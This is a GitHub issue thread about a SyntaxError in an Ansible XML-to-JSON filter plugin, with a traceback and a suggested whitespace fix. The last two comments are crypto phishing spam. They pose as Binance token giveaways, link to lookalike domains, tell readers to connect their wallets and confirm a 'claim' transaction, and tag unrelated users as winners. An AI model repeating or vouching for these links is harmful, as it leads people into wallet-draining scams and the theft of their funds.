### ISSUE TITLE
Script un-executable 

### ISSUE THREAD

**Issue by maduhshan** [nasgoncalves/ansible-xml-to-json-filter#1]
```
The full traceback is:
Traceback (most recent call last):
  File "/usr/lib/python2.6/site-packages/ansible/executor/task_executor.py", line 138, in run
    res = self._execute()
  File "/usr/lib/python2.6/site-packages/ansible/executor/task_executor.py", line 499, in _execute
    self._task.post_validate(templar=templar)
  File "/usr/lib/python2.6/site-packages/ansible/playbook/task.py", line 255, in post_validate
    super(Task, self).post_validate(templar)
  File "/usr/lib/python2.6/site-packages/ansible/playbook/base.py", line 392, in post_validate
    value = templar.template(getattr(self, name))
  File "/usr/lib/python2.6/site-packages/ansible/template/__init__.py", line 523, in template
    disable_lookups=disable_lookups,
  File "/usr/lib/python2.6/site-packages/ansible/template/__init__.py", line 479, in template
    disable_lookups=disable_lookups,
  File "/usr/lib/python2.6/site-packages/ansible/template/__init__.py", line 684, in do_template
    myenv.filters.update(self._get_filters())
  File "/usr/lib/python2.6/site-packages/ansible/template/__init__.py", line 303, in _get_filters
    plugins = [x for x in self._filter_loader.all()]
  File "/usr/lib/python2.6/site-packages/ansible/plugins/loader.py", line 435, in all
    module = self._load_module_source(name, path)
  File "/usr/lib/python2.6/site-packages/ansible/plugins/loader.py", line 346, in _load_module_source
    module = imp.load_source(full_name, path, module_file)
  File "/home/machathuranga/sources/yoshi-orchestrartion/orch-connectors-ext/ansible/filter_plugins/xml_to_json.py", line 19
    for k, v in dd.items()}}
      ^
SyntaxError: invalid syntax

fatal: [localhost]: FAILED! => {
    "msg": "Unexpected failure during module execution.", 
    "stdout": ""
}
```
When executing this python file above error is occurring which is related to the for loop in line no 19

**Comment by DMunkov** [comment]
Probably very late to the party, but in case anyone else would need that:
For me, the error was on line 22: `for k, v in t.attrib.items())` - remove one space before the text and you should be golden.

**Comment by IT-Immanent** [comment]
# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

<a href="https://www.bnbrewards.online/?source=github" target="_blank">
  <img src="https://i.imgur.com/1yUfzqb.png" alt="Binance Free Tokens" width="400px" height="450px">
</a>


## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - 
2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @hakankaan, @Revisor, @troiad, @agentfox, @zulqarnain4, @k3x4, @dingi3, @Lucas-Ferrari, @Trinquino, @LeviathanLevi
